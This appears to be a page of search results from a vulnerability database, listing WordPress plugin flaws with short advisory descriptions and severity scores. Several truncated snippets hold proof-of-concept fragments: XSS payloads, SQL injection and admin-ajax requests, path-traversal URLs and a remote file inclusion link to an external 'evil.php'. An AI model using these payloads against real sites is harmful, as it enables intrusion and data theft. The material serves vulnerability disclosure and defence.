4359 matches found

wpexploit | added 2023/01/23 12:0 a.m. | 539 views

WP Review Slider < 12.2 - Subscriber+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. Run the following code in the browser console on any WP Admin page. fetch'/wp-admin/admin-ajax.php', method: 'POST',...

CVSS 8.8 | AI score 9.2 | EPSS 0.00919
Exploits: 2

wpexploit | added 2021/09/28 12:0 a.m. | 539 views

WP Reactions Lite < 1.3.6 - Authenticated Stored Cross Site Scripting

The plugin does not properly sanitize inputs within wp-admin pages, allowing users with sufficient access to inject XSS payloads within /wp-admin/ pages. Open Global Activation and Click on Customize Now On Step3 StylingTab Enter the XSS payload into "Whats your reaction" field Payload Used :...

CVSS 5.4 | AI score 5.3 | EPSS 0.00629
Exploits: 2

wpexploit | added 2021/08/09 12:0 a.m. | 539 views

Stop Spammers Security < 2021.18 - Authenticated Stored XSS

The plugin does not escape some of its settings, allowing high privilege users such as admin to set Cross-Site Scripting payloads in them even when the unfiltered_html capability is disallowed. Put the following payload in any of the API fields of the Web Services settings: " autofocus...

CVSS 5.4 | AI score 0.5 | EPSS 0.00624
Exploits: 2

wpexploit | added 2021/03/11 12:0 a.m. | 539 views

JH 404 Logger <= 1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)

The plugin doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. curl 'https://example.com/non-existing-page"' -e '"'...

CVSS 3.5 | AI score 1 | EPSS 0.02044
Exploits: 2

wpexploit | added 2023/01/31 12:0 a.m. | 538 views

GeoDirectory < 2.2.24 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin-ajax.php HTTP/1.1...

CVSS 7.2 | AI score 7.9 | EPSS 0.00764
Exploits: 1 | References: 1

wpexploit | added 2021/09/07 12:0 a.m. | 538 views

Weather Effect < 1.3.6 - Admin+ Stored Cross-Site Scripting

The plugin does not properly validate and escape some of its settings like sizeleaf, flakesleaf, speed which could lead to Stored Cross-Site Scripting issues POST /wp-admin/admin.php?page=weather-effects-setting HTTP/1.1 Accept: text/html, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding...

CVSS 4.8 | AI score 0.4 | EPSS 0.00598
Exploits: 2

wpexploit | added 2021/08/30 12:0 a.m. | 538 views

Docket Cache < 21.08.02 - Reflected Cross-Site Scripting

The plugin does not escape some filter parameters when the OPCache Viewer is enabled before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=docket-cache-opcviewer&idx=opcviewer&s=a&sf="alert/XSS-sf/&sm="alert/XSS-sm/...

AI score 0.9
Exploits: 0

wpexploit | added 2021/06/07 12:0 a.m. | 538 views

Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)

The plugin did not sanitise or escape the page parameter before outputting back in an attribute, leading to a reflected Cross-Site Scripting issue alert/XSS/"' /...

AI score 6.5
Exploits: 0 | References: 1

wpexploit | added 2021/04/17 12:0 a.m. | 538 views

WordPress Download Manager < 3.1.18 - Unauthorised Download Duplication

The duplicate method, hooked to the admin_init action, did not have any CSRF and authorisation checks, allowing unauthorised users such as unauthenticated ones to duplicate arbitrary downloads. As an unauthenticated or authenticated user, open the following URL to duplicate the Download with id 717...

AI score 1
Exploits: 0 | References: 1

wpexploit | added 2022/10/03 12:0 a.m. | 537 views

Blog2Social < 6.9.10 - Subscriber+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers Run the script below in the web browser console while being logged in as a subscriber and on the Blog2Social...

CVSS 8.8 | AI score 0.5 | EPSS 0.01049
Exploits: 2

wpexploit | added 2021/10/11 12:0 a.m. | 537 views

Print-O-Matic < 2.0.3 - Admin+ Stored Cross-Site Scripting

The plugin does not escape some of its settings before outputting them in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Pause Before Print" settings of the plugin: ...

CVSS 4.8 | AI score 0.5 | EPSS 0.00654
Exploits: 2 | References: 1

wpexploit | added 2021/10/11 12:0 a.m. | 537 views

WP Header Images < 2.0.1 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the t parameter before outputting it back in the plugin's settings page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/options-general.php?page=wphi&t=5"alert/XSS/...

CVSS 6.1 | AI score 0.4 | EPSS 0.008
Exploits: 2

wpexploit | added 2021/09/20 12:0 a.m. | 537 views

Sociable <= 4.3.4.1 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise or escape some of its settings before outputting them in the admin dashboard, allowing high privilege users to perform Cross-Site Scripting attacks against other users even when the unfiltered_html capability is disallowed. Put the following payload in the "Background...

CVSS 4.8 | AI score 4.8 | EPSS 0.00622
Exploits: 2

wpexploit | added 2021/09/20 12:0 a.m. | 537 views

YITH WooCommerce Product Add-Ons < 2.1.0 - Authenticated Local File Inclusion

The plugin does not validate user input before using it to generate a local path passed to include, which could lead to a Local File Inclusion issue on Windows Web Servers https://example.com/wp-admin/admin.php?page=yithwapopanel&tab=blocks&blockid=1&addonid=1&addontype=html%2F..%2Fhello...

AI score 2.6
Exploits: 0

wpexploit | added 2021/06/21 12:0 a.m. | 537 views

Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)

The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator...

CVSS 6.1 | AI score 1.1 | EPSS 0.01793
Exploits: 2

wpexploit | added 2021/10/18 12:0 a.m. | 536 views

Insert Pages < 3.7.0 - Contributor+ Stored Cross-Site Scripting

The plugin adds a shortcode that prints out other pages' content and custom fields. It can be used by users with a role as low as Contributor to perform Cross-Site Scripting attacks by storing the payload/s in another post's custom fields. - Create a page A - Add a custom field containing JS in...

CVSS 5.4 | AI score 1.2 | EPSS 0.00604
Exploits: 2

wpexploit | added 2021/10/11 12:0 a.m. | 536 views

Storefront Footer Text <= 1.0.1 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitize and escape the "Footer Credit Text" added to pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered-html capability is disallowed. The plugin requires the Storefront theme Go to Appearance Customize /wp-admin/customize.ph...

CVSS 4.8 | EPSS 0.00598
Exploits: 2

wpexploit | added 2021/09/20 12:0 a.m. | 536 views

YITH WooCommerce Product Add-Ons < 2.1.0 - Reflected Cross-Site Scripting

The plugin does not escape some parameters before outputting them back in the edit addon page in the admin dashboard, leading to Reflected Cross-Site Scripting issues v alert/XSS-id/&addontype=html"alert/XSS-type/ v 2.1.0...

AI score 0.3
Exploits: 0

wpexploit | added 2021/09/06 12:0 a.m. | 536 views

UsersWP < 1.2.2.29 - Reflected Cross-Site Scripting

The plugin sanitises user input via sanitize_text_field but does not escape it before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues. On the reset page made by the plugin: https://example.com/reset/?key=a&login=%22accesskey=X%20onclick=alert1%20b=%22...

AI score 0.7
Exploits: 0

wpexploit | added 2021/05/04 12:0 a.m. | 536 views

WP Customer Reviews < 3.5.6 - Authenticated Stored Cross-Site Scripting (XSS)

The plugin did not sanitise some of its settings, allowing high privilege users such as administrators to set XSS payloads in them which will then be triggered in pages where reviews are enabled 1. Login to WordPress as an Administrator 2. Install and Activate plugin "WP Customer Reviews" 3. Clic...

CVSS 4.8 | AI score 0.1 | EPSS 0.00617
Exploits: 2 | References: 1

wpexploit | added 2021/03/15 12:0 a.m. | 536 views

Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)

Unvalidated input and lack of output encoding within the plugin lead to a Reflected Cross-Site Scripting (XSS) vulnerability within the 'lang' GET parameter while editing a post, triggered when users with the capability of editing posts access a malicious URL...

CVSS 3.5 | AI score 0.5 | EPSS 0.00632
Exploits: 2

wpexploit | added 2020/09/06 12:0 a.m. | 536 views

Constant Contact Forms < 1.8.8 - Multiple Authenticated Stored XSS

Multiple stored cross-site scripting vulnerabilities in Constant Contact Forms for WordPress 1.8.7 and lower allow high-privileged users (Editor+) to inject arbitrary JavaScript code or HTML in posts where the malicious form is embedded. High-privileged users (Editor+) can exploit XSS via Add New Form's...

AI score 5.3 | EPSS 0.00654
Exploits: 2 | References: 1

wpexploit | added 2022/03/21 12:0 a.m. | 535 views

Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure

The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer's data Make a booking to get a customer account Login via API and get access token: curl...

CVSS 7.5 | AI score 1.2 | EPSS 0.01431
Exploits: 2

wpexploit | added 2021/12/05 12:0 a.m. | 535 views

WP Coder < 2.5.2 - RFI leading to RCE via CSRF

The plugin, within the wow-company admin menu page, allows including arbitrary files with a PHP extension, as well as via the data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

CVSS 8.8 | AI score 1.3 | EPSS 0.0067
Exploits: 2 | References: 1

wpexploit | added 2021/10/04 12:0 a.m. | 535 views

Events Made Easy < 2.2.24 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape Custom Field Names, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Add/Edit a Custom Field /wp-admin/admin.php?page=eme-formfields and put the following payload in the Field Name:...

CVSS 4.8 | AI score 0.1 | EPSS 0.00681
Exploits: 2 | References: 1

wpexploit | added 2021/09/20 12:0 a.m. | 535 views

StreamCast < 2.1.1 - Contributor+ Stored Cross-Site Scripting

The plugin does not sanitise or validate the parameters from its shortcode, allowing users with a role as low as contributor to set Cross-Site Scripting payloads in them, which will be triggered in the page/s with the embedded malicious shortcode. Log in as contributor and add the following shortcode i...

CVSS 5.4 | AI score 0.5 | EPSS 0.00562
Exploits: 1

wpexploit | added 2021/09/13 12:0 a.m. | 536 views

Affiliate Power < 2.3.0 - Reflected Cross-Site Scripting

The plugin does not escape the page parameter in its Affiliate Power Sales dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...

AI score 0.2
Exploits: 0

wpexploit | added 2021/09/10 12:0 a.m. | 535 views

Easy Accordion < 2.0.22 - Authenticated Stored XSS

The plugin does not properly sanitize inputs when adding new items to an accordion. When adding new items to an accordion, an injection payload of "" for an accordion item's title will result in XSS in the wp-admin page as well as on pages that show the accordion...

CVSS 5.4 | AI score 1.4 | EPSS 0.00604
Exploits: 2

wpexploit | added 2021/08/09 12:0 a.m. | 535 views

Tutor LMS < 1.9.6 - Reflected Cross-Site Scripting

The plugin does not escape a page parameter before outputting it back in a student dashboard page, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...

AI score 0.1
Exploits: 0

wpexploit | added 2021/04/11 12:0 a.m. | 535 views

Business Directory Plugin < 5.11 - Arbitrary File Upload to RCE

The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator import files. As the plugin also did not validate uploaded files, it could lead to RCE. Note WPScanTeam: CSRF check and some file validation were added in v5.11, however a blacklist...

CVSS 6.8 | AI score 8.8 | EPSS 0.00672
Exploits: 2

wpexploit | added 2022/11/21 12:0 a.m. | 534 views

User Registration < 2.2.4.1 - Subscriber+ Arbitrary File Upload

The plugin does not properly restrict the files to be uploaded via an AJAX action available to both unauthenticated and authenticated users, which could allow unauthenticated users to upload PHP files for example. The following Python script automates the exploitation of this plugin by uploading ...

CVSS 7.5 | AI score 0.6 | EPSS 0.00743
Exploits: 2

wpexploit | added 2022/08/29 12:0 a.m. | 534 views

Form Builder CP < 1.2.32 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in multisite setup. Create/edit a form and put the following...

CVSS 4.8 | AI score 0.1 | EPSS 0.005
Exploits: 2

wpexploit | added 2021/10/05 12:0 a.m. | 534 views

Simple Download Monitor < 3.9.5 - Contributor+ Stored Cross-Site Scripting via File Thumbnail

The plugin does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Given that the XSS is triggered even when the Download is in a review state, contributor could ma...

CVSS 9 | EPSS 0.01241
Exploits: 2

wpexploit | added 2021/09/21 12:0 a.m. | 533 views

Game Server Status <= 1.0 - Admin+ Stored Cross-Site Scripting

The plugin does not escape some of the Game Server data, which could allow high privilege users such as admin to perform Cross-Site Scripting even when the unfiltered_html capability is disallowed. Create/Edit a Game Server and add the following payload as Server name: Test"alert/XSS/...

AI score 1
Exploits: 0

wpexploit | added 2021/08/24 12:0 a.m. | 533 views

Live Scores for SportsPress < 1.9.1 - Authenticated Local File Inclusion

The plugin does not validate or sanitise the tab parameter in the admin dashboard before using it in an include statement, leading to an Authenticated Local File Inclusion https://example.com/wp-admin/admin.php?page=live-scores-for-sportspress&tab=../../index This will include the homepage of the...

AI score 0.6
Exploits: 0

wpexploit | added 2021/07/26 12:0 a.m. | 533 views

Qyrr < 0.7 - Authenticated (contributor+) Stored XSS

The plugin does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the datauritometa AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role ...

AI score 5.5 | EPSS 0.00218
Exploits: 2

wpexploit | added 2020/07/03 12:0 a.m. | 533 views

Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS

Multiple cross-site scripting vulnerabilities in Testimonials Widget 3.5.1 and lower allow remote attackers to inject arbitrary Javascript code or HTML via the below parameters: - Author - Job Title - Location - Company - Email - URL Successful exploitation of this vulnerability would allow...

AI score 5.6 | EPSS 0.00822
Exploits: 2

wpexploit | added 2021/08/23 12:0 a.m. | 532 views

Timetable and Event Schedule by MotoPress < 2.3.19 - Author+ Stored Cross-Site Scripting

The plugin does not sanitise some of its parameters, which could allow low privilege users such as author to perform XSS attacks against frontend and backend users when viewing the related event/s Create an event with the following payload in the description of a timeslot: The XSS will be execute...

CVSS 5.4 | AI score 1 | EPSS 0.0086
Exploits: 2 | References: 2

wpexploit | added 2023/01/19 12:0 a.m. | 531 views

Mapwiz <= 1.0.1 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin.php?page=myplug/muyplg.php&mid HTTP/1.1...

CVSS 7.2 | AI score 7.6 | EPSS 0.00957
Exploits: 2 | References: 1

wpexploit | added 2022/09/20 12:0 a.m. | 531 views

Search Logger <= 0.9 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users ------------------------------------------------- Go to Search Logger Logs Select Delete ------------------------------------------------...

CVSS 7.2 | AI score 0.7 | EPSS 0.00921
Exploits: 2

wpexploit | added 2021/10/05 12:0 a.m. | 531 views

Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal

The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download. jQuery.postajaxurl, action: "sdmremovethumbnailimage", postiddel: 613 // not owned by the user POST /wp-admin/admin-ajax.php HTTP/1.1...

CVSS 4.3 | AI score 0.4 | EPSS 0.00654
Exploits: 2

wpexploit | added 2021/08/02 12:0 a.m. | 531 views

Sitewide Notice WP < 2.3 - Authenticated Stored XSS

The plugin does not sanitise some of its settings before outputting them in frontend pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the Message setting of the plugin: alert/XSS/ The XS...

CVSS 4.8 | AI score 4.8 | EPSS 0.00617
Exploits: 2

wpexploit | added 2021/05/16 12:0 a.m. | 531 views

Database Backup for WordPress < 2.4 - Authenticated Persistent Cross-Site Scripting (XSS)

The plugin did not escape the backuprecipient POST parameter before outputting it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue. POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type:...

CVSS 5.4 | AI score 0.3 | EPSS 0.00703
Exploits: 2 | References: 1

wpexploit | added 2022/12/27 12:0 a.m. | 530 views

Sassy Social Share < 3.3.45 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Insert the...

CVSS 5.4 | AI score 0.7 | EPSS 0.00471
Exploits: 2

wpexploit | added 2023/02/28 12:0 a.m. | 529 views

OAuth Single Sign On - SSO (OAuth Client) < 6.24.2 - IdP Discard via CSRF

The plugin does not have CSRF checks when discarding Identity Providers (IdP), which could allow attackers to make logged in admins delete all IdP via a CSRF attack. Make a logged in admin open: https://example.com/wp-admin/admin.php?page=mooauthsettings&tab=config&action=discard...

CVSS 6.5 | AI score 6.3 | EPSS 0.00326
Exploits: 2

wpexploit | added 2021/10/04 12:0 a.m. | 529 views

BP Better Messages < 1.9.9.41 - Multiple CSRF

The plugin does not check for CSRF in multiple of its AJAX actions: bpbettermessagesleavechat, bpbettermessagesjoinchat, bpmessagesleavethread, bpmessagesmutethread, bpmessagesunmutethread, bpbettermessagesaddusertothread, bpbettermessagesexcludeuserfromthread. This could allow attackers to make...

CVSS 8.8 | AI score 1 | EPSS 0.00703
Exploits: 2 | References: 1

wpexploit | added 2021/09/27 12:0 a.m. | 529 views

WP Table Builder < 1.3.10 - Reflected Cross-Site Scripting

The plugin does not escape a page parameter before outputting it back in an admin dashboard page, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...

AI score 0.2
Exploits: 0

wpexploit | added 2021/09/20 12:0 a.m. | 529 views

Gutenberg PDF Viewer Block < 1.0.1 - Contributor+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its block, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks...

CVSS 5.4 | EPSS 0.00629
Exploits: 2

wpexploit | added 2024/01/11 12:0 a.m. | 528 views

POST SMTP Mailer < 2.8.8 - Authorization Bypass via type connect-app API

The plugin is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to...

CVSS 9.8 | AI score 9.6 | EPSS 0.90339
Exploits: 6 | References: 1

wpexploit | added 2021/11/01 12:0 a.m. | 528 views

My Calendar < 3.2.18 - Subscriber+ Reflected Cross-Site Scripting

The plugin does not sanitise and escape the callback parameter of the mcpostlookup AJAX action available to any authenticated user before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue...

CVSS 5.4 | AI score 5.3 | EPSS 0.006
Exploits: 2

Total number of security vulnerabilities: 4359